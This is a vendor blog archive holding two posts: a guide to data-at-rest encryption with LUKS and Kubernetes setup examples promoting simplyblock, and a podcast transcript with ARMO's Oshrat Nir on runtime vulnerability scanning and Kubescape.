Security Archives | simplyblock https://www.simplyblock.io/blog/tags/security/ NVMe-First Kubernetes Storage Platform Fri, 31 Jan 2025 12:34:02 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.simplyblock.io/wp-content/media/cropped-icon-rgb-simplyblock-32x32.png Security Archives | simplyblock https://www.simplyblock.io/blog/tags/security/ 32 32 Encryption At Rest: A Comprehensive Guide to DARE https://www.simplyblock.io/blog/encryption-at-rest-dare/ Tue, 17 Dec 2024 10:22:44 +0000 https://www.simplyblock.io/?p=4645 TLDR: Data At Rest Encryption (DARE) is the process of encrypting data when stored on a storage medium. The encryption transforms the readable data (plaintext) into an encoded format (ciphertext) that can only be decrypted with knowledge about the correct encryption key. Today, data is the “new gold” for companies. Data collection happens everywhere and […]

The post Encryption At Rest: A Comprehensive Guide to DARE appeared first on simplyblock.

]]>
TLDR: Data At Rest Encryption (DARE) is the process of encrypting data when stored on a storage medium. The encryption transforms the readable data (plaintext) into an encoded format (ciphertext) that can only be decrypted with knowledge about the correct encryption key.

Today, data is the “new gold” for companies. Data collection happens everywhere and at any time. The global amount of data collected is projected to reach 181 Zettabytes (that is 181 billion Terabytes) by the end of 2025. A whopping 23.13% increase over 2024.

That means data protection is becoming increasingly important. Hence, data security has become paramount for organizations of all sizes. One key aspect of data security protocols is data-at-rest encryption, which provides crucial protection for stored data.

Data At Rest Encryption or Encryption At Rest

Understanding the Data-in-Use, Data-in-Transit, and Data-at-Rest

Before we go deep into DARE, let’s quickly discuss the three states of data within a computing system and infrastructure.

Data at rest encryption, data in transit encryption, data in use encryption
Figure 1: The three states of data in encryption

To start, any type of data is created inside an application. While the application holds onto it, it is considered as data in use. That means data in use describes information actively being processed, read, or modified by applications or users.

For example, imagine you open a spreadsheet to edit its contents or a database to process a query. This data is considered “in use.” This state is often the most vulnerable as the data must be in an unencrypted form for processing. However, technologies like confidential computing enable encrypted memory to process even these pieces of data in an encrypted manner.

Next, data in transit describes any information moving between locations. Locations means across the internet, within a private network, or between memory and processors. Examples include email messages being sent, files being downloaded, or database query results traveling between the database server and applications—all examples of data in transit.

Last but not least, data at rest refers to any piece of information stored physically on a digital storage media such as flash storage or hard disk. It also considers storage solutions like cloud storage, offline backups, and file systems as valid digital storage. Hence, data stored in these services is also data at rest. Think of files saved on your laptop’s hard drive or photos stored in cloud storage such as Google Drive, Dropbox, or similar.

Criticality of Data Protection

For organizations, threats to their data are omnipresent. Starting from unfortunate human error, deleting important information, coordinated ransomware attacks, encryption of your data, and asking for a ransom to actual data leaks.

Especially with data leaks, most people think about external hackers copying data off of the organization’s network and making it public. However, this isn’t the only way data is leaked to the public. There are many examples of Amazon S3 buckets without proper authorization, databases being accessible from the outside world, or backup services being accessed.

Anyhow, organizations face increasing threats to their data security. Any data breach has consequences, which are categorized into four segments:

  1. Financial losses from regulatory fines and legal penalties
  2. Damage to brand reputation and loss of customer trust
  3. Exposure of intellectual property to competitors
  4. Compliance violations with regulations like GDPR, HIPAA, or PCI DSS

While data in transit is commonly protected through TLS (transport layer encryption), data at rest encryption (or DARE) is often an afterthought. This is typically because the setup isn’t as easy and straightforward as it should be. It’s this “I can still do this afterward” effect: “What could possibly go wrong?”

However, data at rest is the most vulnerable of all. Data in use is often unprotected but very transient. While there is a chance of a leak, it is small. Data at rest persists for more extended periods of time, giving hackers more time to plan and execute their attacks. Secondly, persistent data often contains the most valuable pieces of information, such as customer records, financial data, or intellectual property. And lastly, access to persistent storage enables access to large amounts of data within a single breach, making it so much more interesting to attackers.

Understanding Data At Rest Encryption (DARE)

Simply spoken, Data At Rest Encryption (DARE) transforms stored data into an unreadable format that can only be read with the appropriate encryption or decryption key. This ensures that the information isn’t readable even if unauthorized parties gain access to the storage medium.

That said, the strength of the encryption used is crucial. Many encryption algorithms we have considered secure have been broken over time. Encrypting data once and taking for granted that unauthorized parties can’t access it is just wrong. Data at rest encryption is an ongoing process, potentially involving re-encrypting information when more potent, robust encryption algorithms are available.

Available Encryption Types for Data At Rest Encryption

Symmetric encryption (same encryption key) vs asymmetric encryption (private and public key)
Figure 2: Symmetric encryption (same encryption key) vs asymmetric encryption (private and public key)

Two encryption methods are generally available today for large-scale setups. While we look forward to quantum-safe encryption algorithms, a widely adopted solution has yet to be developed. Quantum-safe means that the encryption will resist breaking attempts from quantum computers.

Anyhow, the first typical type of encryption is the Symmetric Encryption. It uses the same key for encryption and decryption. The most common symmetric encryption algorithm is AES, the Advanced Encryption Standard.

const cipherText = encrypt(plaintext, encryptionKey);
const plaintext = decrypt(cipherText, encryptionKey);

The second type of encryption is Asymmetric Encryption. Hereby, the encryption and decryption routines use different but related keys, generally referred to as Private Key and Public Key. According to their names, the public key can be publicly known, while the private key must be kept private. Both keys are mathematically connected and generally based on a hard-to-solve mathematical problem. Two standard algorithms are essential: RSA (the Rivest–Shamir–Adleman encryption) and ECDSA (the Elliptic Curve Digital Signature Algorithm). While RSA is based on the prime factorization problem, ECDSA is based on the discrete log problem. To go into detail about those problems is more than just one additional blog post, though.

const cipherText = encrypt(plaintext, publicKey);
const plaintext = decrypt(cipherText, privateKey);

Encryption in Storage

The use cases for symmetric and asymmetric encryption are different. While considered more secure, asymmetric encryption is slower and typically not used for large data volumes. Symmetric encryption, however, is fast but requires the sharing of the encryption key between the encrypting and decrypting parties, making it less secure.

To encrypt large amounts of data and get the best of both worlds, security and speed, you often see a combination of both approaches. The symmetric encryption key is encrypted with an asymmetric encryption algorithm. After decrypting the symmetric key, it is used to encrypt or decrypt the stored data.

Simplyblock provides data-at-rest encryption directly through its Kubernetes CSI integration or via CLI and API. Additionally, simplyblock can be configured to use a different encryption key per logical volume for the highest degree of security and muti-tenant isolation.

Key Management Solutions

Next to selecting the encryption algorithm, managing and distributing the necessary keys is crucial. This is where key management solutions (KMS) come in.

Generally, there are two basic types of key management solutions: hardware and software-based.

For hardware-based solutions, you’ll typically utilize an HSM (Hardware Security Module). These HSMs provide a dedicated hardware token (commonly a USB key) to store keys. They offer the highest level of security but need to be physically attached to systems and are more expensive.

Software-based solutions offer a flexible key management alternative. Almost all cloud providers offer their own KMS systems, such as Azure Key Vault, AWS KMS, or Google Cloud KMS. Additionally, third-party key management solutions are available when setting up an on-premises or private cloud environment.

When managing more than a few encrypted volumes, you should implement a key management solution. That’s why simplyblock supports KMS solutions by default.

Implementing Data At Rest Encryption (DARE)

Simply said, you should have a key management solution ready to implement data-at-rest encryption in your company. If you run in the cloud, I recommend using whatever the cloud provider offers. If you run on-premises or the cloud provider doesn’t provide one, select from the existing third-party solutions.

DARE with Linux

As the most popular server operating system, Linux has two options to choose from when you want to encrypt data. The first option works based on files, providing a filesystem-level encryption.

Typical solutions for filesystem-level based encryption are eCryptfs, a stacked filesystem, which stores encryption information in the header information of each encrypted file. The benefit of eCryptfs is the ability to copy encrypted files to other systems without the need to decrypt them first. As long as the target node has the necessary encryption key in its keyring, the file will be decrypted. The alternative is EncFS, a user-space filesystem that runs without special permissions. Both solutions haven’t seen updates in many years, and I’d generally recommend the second approach.

Block-level encryption transparently encrypts the whole content of a block device (meaning, hard disk, SSD, simplyblock logical volume, etc.). Data is automatically decrypted when read. While there is VeraCrypt, it is mainly a solution for home setups and laptops. For server setups, the most common way to implement block-level encryption is a combination of dm-crypt and LUKS, the Linux Unified Key Setup.

Linux Data At Rest Encryption with dm-crypt and LUKS

The fastest way to encrypt a volume with dm-crypt and LUKS is via the cryptsetup tools.

Debian / Ubuntu / Derivates:

sudo apt install cryptsetup 

RHEL / Rocky Linux / Oracle:

yum install cryptsetup-luks

Now, we need to enable encryption for our block device. In this example, we assume we already have a whole block device or a partition we want to encrypt.

Warning: The following command will delete all data from the given device or partition. Make sure you use the correct device file.

cryptsetup -y luksFormat /dev/xvda

I recommend always running cryptsetup with the -y parameter, which forces it to ask for the passphrase twice. If you misspelled it once, you’ll realize it now, not later.

Now open the encrypted device.

cryptsetup luksOpen /dev/xvda encrypted

This command will ask for the passphrase. The passphrase is not recoverable, so you better remember it.

Afterward, the device is ready to be used as /dev/mapper/encrypted. We can format and mount it.

mkfs.ext4 /dev/mapper/encrypted
mkdir /mnt/encrypted
mount /dev/mapper/encrypted /mnt/encrypted

Data At Rest Encryption with Kubernetes

Kubernetes offers ephemeral and persistent storage as volumes. Those volumes can be statically or dynamically provisioned.

For pre-created and statically provisioned volumes, you can follow the above guide on encrypting block devices on Linux and make the already encrypted device available to Kubernetes.

However, Kubernetes doesn’t offer out-of-the-box support for encrypted and dynamically provisioned volumes. Encrypting persistent volumes is not in Kubernetes’s domain. Instead, it delegates this responsibility to its container storage provider, connected through the CSI (Container Storage Interface).

Note that not all CSI drivers support the data-at-rest encryption, though! But simplyblock does!

Data At Rest Encryption with Simplyblock

DARE stack for Linux: dm-crypt+LUKS vs Simplyblock
Figure 3: Encryption stack for Linux: dm-crypt+LUKS vs Simplyblock

Due to the importance of DARE, simplyblock enables you to secure your data immediately through data-at-rest encryption. Simplyblock goes above and beyond with its features and provides a fully multi-tenant DARE feature set. That said, in simplyblock, you can encrypt multiple logical volumes (virtual block devices) with the same key or one key per logical volume.

The use cases are different. One key per volume enables the highest level of security and complete isolation, even between volumes. You want this to encapsulate applications or teams fully.

When multiple volumes share the same encryption key, you want to provide one key per customer. This ensures that you isolate customers against each other and prevent data from being accessible by other customers on a shared infrastructure in the case of a configuration failure or similar incident.

To set up simplyblock, you can configure keys manually or utilize a key management solution. In this example, we’ll set up the key manual. We also assume that simplyblock has already been deployed as your distributed storage platform, and the simplyblock CSI driver is available in Kubernetes.

First, let’s create our Kubernetes StorageClass for simplyblock. Deploy the YAML file via kubectl, just as any other type of resource.

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
    name: encrypted-volumes
provisioner: csi.simplyblock.io
parameters:
    encryption: "True"
    csi.storage.k8s.io/fstype: ext4
    ... other parameters
reclaimPolicy: Delete
volumeBindingMode: Immediate
allowVolumeExpansion: true

Secondly, we generate the two keys. Note the results of the two commands down.

openssl rand -hex 32   # Key 1
openssl rand -hex 32   # Key 2

Now, we can create our secret and Persistent Volume Claim (PVC).

apiVersion: v1
kind: Secret
metadata:
    name: encrypted-volume-keys
data:
    crypto_key1: 
    crypto_key2: 
–--
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
    annotations:
        simplybk/secret-name: encrypted-volume-keys
    name: encrypted-volume-claim
spec:
    storageClassName: encrypted-volumes
    accessModes:
        - ReadWriteOnce
    resources:
        requests:
            storage: 200Gi

And we’re done. Whenever we use the persistent volume claim, Kubernetes will delegate to simplyblock and ask for the encrypted volume. If it doesn’t exist yet, simplyblock will create it automatically. Otherwise, it will just provide it to Kubernetes directly. All data written to the logical volume is fully encrypted.

Best Practices for Securing Data at Rest

Implementing robust data encryption is crucial. In the best case, data should never exist in a decrypted state.

That said, data-in-use encryption is still complicated as of writing. However, solutions such as Edgeless Systems’ Constellation exist and make it possible using hardware memory encryption.

Data-in-transit encryption is commonly used today via TLS. If you don’t use it yet, there is no time to waste. Low-hanging fruits first.

Data-at-rest encryption in Windows, Linux, or Kubernetes doesn’t have to be complicated. Solutions such as simplyblock enable you to secure your data with minimal effort.

However, there are a few more things to remember when implementing DARE effectively.

Data Classification

Organizations should classify their data based on sensitivity levels and regulatory requirements. This classification guides encryption strategies and key management policies. A robust data classification system includes three things:

  • Sensitive data identification: Identify sensitive data through automated discovery tools and manual review processes. For example, personally identifiable information (PII) like social security numbers should be classified as highly sensitive.
  • Classification levels: Establish clear classification levels such as Public, Internal, Confidential, and Restricted. Each level should have defined handling requirements and encryption standards.
  • Automated classification: Implement automated classification tools to scan and categorize data based on content patterns and metadata.

Access Control and Key Management

Encryption is only as strong as the key management and permission control around it. If your keys are leaked, the strongest encryption is useless.

Therefore, it is crucial to implement strong access controls and key rotation policies. Additionally, regular key rotation helps minimize the impact of potential key compromises and, I hate to say it, employees leaving the company.

Monitoring and Auditing

Understanding potential risks early is essential. That’s why it must maintain comprehensive logs of all access to encrypted data and the encryption keys or key management solutions. Also, regular audits should be scheduled for suspicious activities.

In the best case, multiple teams run independent audits to prevent internal leaks through dubious employees. While it may sound harsh, there are situations in life where people take the wrong path. Not necessarily on purpose or because they want to.

Data Minimization

The most secure data is the data that isn’t stored. Hence, you should only store necessary data.

Apart from that, encrypt only what needs protection. While this sounds counterproductive, it reduces the attack surface and the performance impact of encryption.

Data At Rest Encryption: The Essential Component of Data Management

Data-at-rest encryption (DARE) has become essential for organizations handling sensitive information. The rise in data breaches and increasingly stringent regulatory requirements make it vital to protect stored information. Additionally, with the rise of cloud computing and distributed systems, implementing DARE is more critical than ever.

Simplyblock integrates natively with Kubernetes to provide a seamless approach to implementing data-at-rest encryption in modern containerized environments. With our support for transparent encryption, your organization can secure its data without any application changes. Furthermore, simplyblock utilizes the standard NVMe over TCP protocol which enables us to work natively with Linux. No additional drivers are required. Use a simplyblock logical volume straight from your dedicated or virtual machine, including all encryption features.

Anyhow, for organizations running Kubernetes, whether in public clouds, private clouds, or on-premises, DARE serves as a fundamental security control. By following best practices and using modern tools like Simplyblock, organizations can achieve robust data protection while maintaining system performance and usability.

But remember that DARE is just one component of a comprehensive data security strategy. It should be combined with other security controls, such as access management, network security, and security monitoring, to create a defense-in-depth approach to protecting sensitive information.

That all said, by following the guidelines and implementations detailed in this article, your organization can effectively protect its data at rest while maintaining system functionality and performance.

As threats continue to evolve, having a solid foundation in data encryption becomes increasingly crucial for maintaining data security and regulatory compliance.

What is Data At Rest Encryption?

Data At Rest Encryption (DARE), or encryption at rest, is the encryption process of data when stored on a storage medium. The encryption transforms the readable data (plaintext) into an encoded format (ciphertext) that can only be decrypted with knowledge about the correct encryption key.

What is Data-At-Rest?

Data-at-rest refers to any piece of information written to physical storage media, such as flash storage or hard disk. This also includes storage solutions like cloud storage, offline backups, and file systems as valid digital storage.

What is Data-In-Use?

Data-in-use describes any type of data created inside an application, which is considered data-in-use as long as the application holds onto it. Hence, data-in-use is information actively processed, read, or modified by applications or users.

What is Data-In-Transit?

Data-in-transit describes any information moving between locations, such as data sent across the internet, moved within a private network, or transmitted between memory and processors.

The post Encryption At Rest: A Comprehensive Guide to DARE appeared first on simplyblock.

]]>
data-at-rest-encryption–encryption-at-rest data-at-rest–data-in-transit–data-in-use symmetric-encryption-vs-asymmetric-encryption encryption-stack-linux-dm-crypt-luks-and-simplyblock
Continuous vulnerability scanning in production with Oshrat Nir from ARMO https://www.simplyblock.io/blog/continuous-vulnerability-scanning-in-production-with-video/ Fri, 24 May 2024 12:11:05 +0000 https://www.simplyblock.io/?p=266 This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site. In this installment of podcast, we’re joined by Oshrat Nir ( Twitter/X , Personal Blog ), a Developer Advocate from ARMO, who talks about the importance of runtime […]

The post Continuous vulnerability scanning in production with Oshrat Nir from ARMO appeared first on simplyblock.

]]>
This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site.

In this installment of podcast, we’re joined by Oshrat Nir ( Twitter/X , Personal Blog ), a Developer Advocate from ARMO, who talks about the importance of runtime vulnerability scanning. See below for more information on what vulnerability scanning is, what vulnerability scanning tools exist and how simplyblock uses vulnerability scanning. Also see interview transcript at the end.

EP13: Continuous vulnerability scanning in production with Oshrat Nir from ARMO

Key Learnings

What is Vulnerability Scanning?

Vulnerability scanning is a security process that involves using automated tools to identify and evaluate security weaknesses in a computer system, network, or application. The main objective of vulnerability scanning is to find vulnerabilities that could potentially be exploited by attackers to gain unauthorized access, cause disruptions, or steal data. Here’s a more detailed breakdown of what vulnerability scanning entails:

Identification:

  • Asset Discovery: The process begins with identifying all the assets (servers, networks, applications, etc.) within the scope of the scan.
  • Cataloging: Creating a comprehensive list of these assets, including software versions, configurations, and open ports.

Scanning:

  • Automated Tools: Using specialized software tools that automatically scan the identified assets for known vulnerabilities. These tools often maintain a database of known vulnerabilities, which is regularly updated.
  • Types of Scans:

** Network Scans: Focus on identifying vulnerabilities in network devices and configurations. ** Host Scans: Target individual computers and servers to find vulnerabilities in operating systems and installed software. ** Application Scans: Look for security weaknesses in web applications, APIs, and other software applications.

Analysis:

  • Vulnerability Database: Comparing scan results against a database of known vulnerabilities to identify matches.
  • Severity Assessment: Evaluating the severity of identified vulnerabilities based on factors like potential impact, exploitability, and exposure.

Reporting:

  • Detailed Reports: Generating reports that detail the vulnerabilities found, their severity, and recommendations for remediation.
  • Prioritization: Providing a prioritized list of vulnerabilities to address based on their potential impact on the organization.

Remediation:

  • Patch Management: Applying software updates and patches to fix the vulnerabilities.
  • Configuration Changes: Adjusting system and network configurations to eliminate vulnerabilities.
  • Mitigation Strategies: Implementing additional security measures, such as firewalls or intrusion detection systems, to mitigate the risk of exploitation.

Rescanning:

  • Verification: Conducting follow-up scans to ensure that previously identified vulnerabilities have been successfully addressed.
  • Continuous Monitoring: Implementing ongoing scanning to detect new vulnerabilities as they emerge.

What are some Vulnerability Scanning Tools?

There are various vulnerability scanning tools available, each with its own focus and strengths. See some of the main types below: Network Vulnerability Scanners Web Application Scanners Database Scanners Cloud Vulnerability Scanners

Some of the most widely-used tools include: Tenable Nessus : Comprehensive vulnerability scanner for identifying and assessing vulnerabilities, misconfigurations, and malware across various systems. OpenVAS : An open-source tool for vulnerability scanning and management, derived from Nessus. Enterprise TruRisk™ Platform : A cloud-based service that offers continuous vulnerability scanning and compliance management, previously known as QualysGuard. Rapid7 Nexpose : A real-time vulnerability management solution that helps in identifying, prioritizing, and remediating vulnerabilities. Acunetix : Focused on web application security, it identifies vulnerabilities such as SQL injection, cross-site scripting, and other web-related issues. IBM Security QRadar : A security information and event management (SIEM) solution that integrates vulnerability scanning and management. OWASP ZAP (Zed Attack Proxy) : An open-source tool aimed at finding vulnerabilities in web applications. Nikto : An open-source web server scanner that checks for dangerous files, outdated server components, and other security issues. ARMO Kubescape : An open-source Kubernetes security platform offering vulnerability and misconfiguration scanning, risk assessment, as well as reporting on security compliance. See our podcast episode with Oshrat Nir from ARMO . Snyk : A platform to provide vulnerability, misconfiguration, and code security flaws throughout all of the development process. See our podcast episode with Brian Vermeer from Snyk .

How does Simplyblock use Vulnerability Scanning?

Simplyblock employs vulnerability scanning to ensure the security and integrity of its cloud-based aspects of their storage solutions. For the storage clusters, simplyblock seamlessly works with the industry-standard vulnerability scanning solutions. That means that storage clusters, running the simplyblock storage system, inside the customer’s AWS account can be discovered, catalogued, and monitored for outdated software, misconfigurations, and other security risks. This involves using automated tools to identify, assess, and mitigate potential security threats across their infrastructure.

Transcript

Chris Engelbert: Welcome back to the next episode of simplyblock’s Cloud Commute podcast. This week, I have another guest from the security space, something that really is close to my heart. So thank you for being here, Oshrat. Is that actually correct? I forgot to ask up front.

Oshrat Nir: It’s hard to say my name correctly if you’re not a native Hebrew speaker, but Oshrat is close enough.

Chris Engelbert: Okay. It’s close enough. All right. I forgot to ask that. So maybe you do a quick introduction. Who are you? Where are you from? What do you do? And we’ll take it from there.

Oshrat Nir: So thanks, Chris, for having me. This is a great opportunity. My name is Oshrat Nir. I am currently the developer advocate for ARMO and Kubescape, which is our CNCF sandbox project. We have an enterprise and an open source platform that I look after. I’ve been at ARMO for a year and a half. I’ve been in cloud native for about 5.5 years. And before that, I worked in telco. And fun fact about me is that I lived on 3 continents before I was 9 years old.

Chris Engelbert: All right. We’ll come back to that. Or maybe just now. What do you mean you lived on 3continents?

Oshrat Nir: I was born in Germany, which is Europe. Then I left Germany when I was nearly 3and moved to the States. I lived in Philadelphia for6 years. When I was 8.5years old, I moved to Israel and that’s where I’ve been living since.

Chris Engelbert: All right. So you’re not-

Oshrat Nir: I don’t speak German.

Chris Engelbert: Fair enough.

Oshrat Nir: I tried to learn German when I was working for a German company. My friend at Giant, shout out to Giant Swarm. But no, they did a lot of good things for me, like introducing me to cloud native, but German was not one of them.

Chris Engelbert: I agree. I feel sad for everyone who has to learn German. The grammar is such a pain.Anyway, you said you work for ARMO. So tell us a little bit about ARMO, a little bit more than it’s open source or enterprise.

Oshrat Nir: Okay. So ARMO is a cybersecurity company. The co-founders are Shauli Rozen, who is now our CEO, and Ben Hirschberg, who is our CTO, and another co-founder who’s now on the board called Leonid Sandler. Originally, Leonid and Ben come from cybersecurity. They’ve been doing it since the 90s. They built out a really, really good product that required installing an agent in a cluster. It was highly intrusive and very resource intensive. It might’ve been a good idea, but it was like maybe, I don’t know, maybe five years ahead of its time because that was in the days where agent-less was the thing. And it kind of, it became a thing. Then what happened was that NSA and CISA came out with the guidelines for hardening Kubernetes. That was in August of 2021. They grabbed that idea and built an open source misconfiguration scanner based on that framework, and that’s Kubescape.

They built it out, and it went crazy within days. The star chart was nearly perpendicular. It got to thousands of stars very quickly. By the way, we are waiting to get to 10,000 stars. So if anybody uses and likes us, please, we really, really want to celebrate that 10K milestone. We reached 1,000, 3,000, 5,000 stars very quickly. Then we added more frameworks to the misconfiguration scanner, which include CIS benchmarks. I mean, everybody uses the benchmark. These were all things that allowed people to easily adhere to these frameworks and help with continuous compliance. But you can’t, I don’t know, Alice in Wonderland. I worked with Lewis Carroll. ‘You need to run in order to stay in place,’ said the Red Queen to Alice.

So we had to continue to develop the product into a platform because the misconfiguration scanner is not enough. Then we went into CD scanning, image scanning. So there’s image scanning, repository scanning, scan the cluster. We also have an agent-less flavor, which was the original way we worked. Then we decided, even though past experience showed that the market was good for that, to also develop an agent, an operator that you put on your cluster. Because things that you can see from inside the cluster are not the same as things you can see from outside the cluster.That’s really important in terms of security, because you don’t want blind spots. You want to have all your bases covered, if I were to use an American sports analogy. So you want to have everything covered. That’s how Kubescape continued to develop.

At the end of 2023, or yeah, it was December of 2023, no, sorry, December of 2022. We were accepted, Kubescape was accepted by the CNCF as a sandbox project. The first misconfiguration scanner in the CNCF. And we’re still there, happy, growing, and we’re at a bid for incubation. So if I do another plug here now, if you’re using Kubescape and you love it, please add yourself to the adopters list because we want to get to incubation in 2024.We only have 7 months to go, so yeah, please help us with that.

What happened when Kubescape was accepted into the CNCF, we had to break it out of our enterprise offerings, out of our commercial offering. So we broke it out, and now we have two offerings. We have ARMO platform, which is the enterprise offering. It’s either SaaS or as a private installation, whatever works. And of course, Kubescape, which is open source, free for all, anybody can use or contribute. It seems that people really know and love Kubescape.This is the impression I got from when I came back from Paris at the KubeCon. I mean, people stopped at the ARMO booth and said, “Oh, you’re Kubescape.” So yeah, Kubescape is very known. It’s a known brand, and people seem to like it, which is great.

Chris Engelbert: Right, right. So as I said, we just had a guest, like, I think 2weeks ago, Brian Vermeer from Snyk. I just learned it’s actually pronounced Snyk[Sneak]. And they’re also in the security space. But from my understanding, ARMO is slightly different. So Snyk mostly looks at the developer and the build pipeline, trying to make sure that all possible vulnerabilities are found before you actually deploy. Common coding mistakes, like the typical SQL injection, all that kind of stuff is caught before it actually can get into production.But with the onsite or continuous online scanning, whatever you want to call it, ARMO is on the other side of these things, right? So why would you need that? Why would you want that continuous scanning? I mean, if there was no security issue, why would there be one in production at some point?

Oshrat Nir: Okay, so first, let’s kind of dial this a little back. Snyk talks about themselves as an app tech company, and they look at things from the workload or application point of view, and then they work their way down. And they get informed by information from cloud providers, etc.ARMO is the other way around. We start from the infrastructure. Kubernetes infrastructure is like something that has never been before. I mean, Kubernetes is different. You can’t use legacy processes and tools to scan your Kubernetes because you just don’t get everything that you need. Kubernetes is ephemeral, it scales up, it scales down. Containers don’t last as long, so you don’t have time to test them. There’s a lot of things that you could do in the past and you can’t do with Kubernetes.

So the way we look at securing Kubernetes and by extension the applications or the workloads running on it is the fact that we start from the infrastructure. We work off of those frameworks, best practices that we talked about, and we use runtime to inform our security because one of the main problems that people securing Kubernetes have is the fact that if they work according to best practices, their applications break or may break. And what you need to do is understand application behavior and then secure the infrastructure informed bythat.

So it’s sort of a different perspective. We kind of do bottom up and Snyk does top down, and we kind of meet at the application, I would say, because I don’t think Snyk goes all the way down to Kubernetes and we don’t go all the way up to the SaaS or all of those four little acronyms that aren’t exactly in the Kubernetes world, but over Kubernetes.

Chris Engelbert: So as a company, I actually want both tools, right? I want the development side, the bottom up to make sure that I catch as much as possible before even going into production. And I want the top down approach in production to make sure that nothing happens at runtime, because I think ARMO also does compliance testing in terms of that my policies are correct. It looks for misconfiguration. So it looks much more on the operational side, stuff that a lot of the other tools, I think, will not necessarily catch easily.

Oshrat Nir: Correct.ARMO looks again, we are there throughout the software development lifecycle from the beginning, even to the point where you can do registry scanning and repo scanning and image scanning before. And then as you write things and as you build out your pipelines, you put security gateways in the pipelines using ARMO.

And an interesting thing, we have started to leverage eBPF a lot from many of the things that we do. In order to reduce the signal-to-noise ratio, one of the problems that there is in the world of DevOps and in the operations is alert fatigue, a lot of false positives. And peopleareso overwhelmed. And there’s also a missing piece, because again, even in the world of CVEs, when you’re judging things only by their CVSS, only by the severity and the score of the CVE, then you might not be as efficient as you need to be. Because sometimes you have a high severity vulnerability, somewhere, that doesn’t even get loaded into memory. So it’s not a problem that you have to deal with now. You can deal with it somewhere in the future when you have time, which is never, because nobody ever has time.

But the idea is, again, having production informing what happens in operation by saying, ‘Okay, this way the application or the workload needs to work, and this is why I care about this vulnerability and not that vulnerability.’

Chris Engelbert: Right, right.

Oshrat Nir: Now, speaking of that, ARMO is working on introducing, we already have this in beta in Kubescape, but it’s coming out at ARMO as well, on cloud-native detection and response, like runtime, or for runtime. So we have built out, since we’ve been working with the workload, since we’ve been using eBPF to see how applications are supposed to act so that we can secure the infrastructure without breaking the application, what we’re doing now is saying, ‘Okay, so now we know how the application needs to act’, so I can actually alert you on when it’s acting abnormally, and then we have anomaly detection. I can actually detect the fingerprints of malware, and then I can flag that and say, ‘Look, this might be problematic.You might be needing to look at this because you might have a virus,’because people might be scanning CVEs. And sorry for the 90s reference, but I’m a Gen X-er, people might be scanning for CVEs, but they’re not looking for viruses on images. And that’s just the problem waiting to happen.

Chris Engelbert: Especially with something like the XZ issue just recently.

Oshrat Nir: There you go.

Chris Engelbert: And I think that probably opened the eyes of a lot of people, that to what extent or to what length people go to inject stuff into your application and take over either your build pipeline or your eventual production. I think in the XZ situation, it was like a backdoor that would eventually make it into production, so you have access to production systems.

Yeah, I agree.And you said another important thing, and I’m coming from a strong Java background. It’s about dynamically loading libraries or dependencies. And Java was like the prime example in the past. Not everything you had in your classpath was necessarily loaded into RAM or into memory. But you have the same thing for JavaScript, for PHP, for Python, and especially JavaScript, TypeScript, Python. Those are like the big comers, not newcomers, but the big comers or upcomers in terms of dynamic languages. So yeah, I get that. That is really interesting in the sense of you look at runtime and just because something is in your image doesn’t necessarily mean it’s bad. It’s going to be bad the second it’s loaded into memory and is available to the application. That makes a lot of sense.So you said ARMO runs inside the Kubernetes cluster, right? There’s an operator, I guess.

Oshrat Nir: Yeah.

Chris Engelbert: So do I need to be prepared of anything? Is there anything special I need to think about or is it literally you drop it in, and because it’s eBPF and agent-less it does all the magic for me and I don’t have to think about it at all.Like magic.

Oshrat Nir: Yeah, the idea is for you not to think about it. However, we do give users tools. Again, we’re very cognizant of alert fatigue because what happens is people are overwhelmed. So they’ll either work themselves to burnout or start ignoring things. Neither is a good option.

Okay, so what we want to do is thinking about the usability about the processes, not just the UX, but about the processes that are involved. So we have configurable security controls. You can quiet alerts for specific things, either forever, because this is a risk you’re willing to take. Or that’s just the way the app works and you can’t change it or you’re not changing for now.

So you can configure the controls, you can set down alerts for a configurable period of time or forever. And all of these things are in order to bring you to the point where you really, really, focus on the things that you need. And you increase the efficiency of your security work. You only fix what needs are these things. A good example here is a task path. People, I mean, it’s called an attack chain, an attack vector, kill chain, there’s lots of terminology around the same thing. But basically what it says is that there’s a step by step taskor thing that an attacker would use in order to compromise your entity. There are different entry points that are caused by either misconfigurations or viruses or vulnerabilities, etc. So what we do is we provide a visualization of a possible attack path and say, ok, it’s sort of a, I’m hesitant to use the word node because Kubernetes, but it’s kind of a node of the subway map sort of thing where you can basically, you can check for each node what you need to fix. Sometimes there’s one node where you need to fix one misconfiguration and you’re done and you immediately hardened your infrastructure to the point where the attack path is blocked.Of course, you need to fix everything around that. But the first thing you need to do is to make sure that you’re secure now. And that really helps and it increases the efficiency.

Chris Engelbert: Right. So you’re basically cutting off the chain of possible possibilities so that even if a person gets to that point, it’s now stopped in its tracks, basically. All right. That’s interesting. That sounds that sounds very useful.

Oshrat Nir: Yeah, I think that’s an important thing because that’s basically our North Star where we’re saying we know that security work is hard. We know that it’s been delegated to DevOps people that don’t necessarily like it or want to do it and are overwhelmed with other things and want to do things that they find more interesting, which is great. Although, you know, security people,don’t take me personally, I work for a security company. I think it’s interesting. But my point is, is that and this is I’m sorry, this is a Snyk tagline. Sorry, Brian. But but you want security tools that DevOps people will use. And that’s basically what we’re doing at ARMO. We want to create a security tool that DevOps people will use and security people will love. And again, sorry, Snyk. That’s basically the same thing, but we’re coming from the bottom, your from the top.

Chris Engelbert: I to be to be honest, I think that is perfectly fine. They probably appreciate the call out, to be honest.

Right. So because we’re almost running out of time, we’re pretty much running out of time right now. Do you think that there is or what is your feeling about security as a thought at companies? Do they like neglect it a little bit?Do they see it as important as it should be? What is your feeling? Is there headroom?

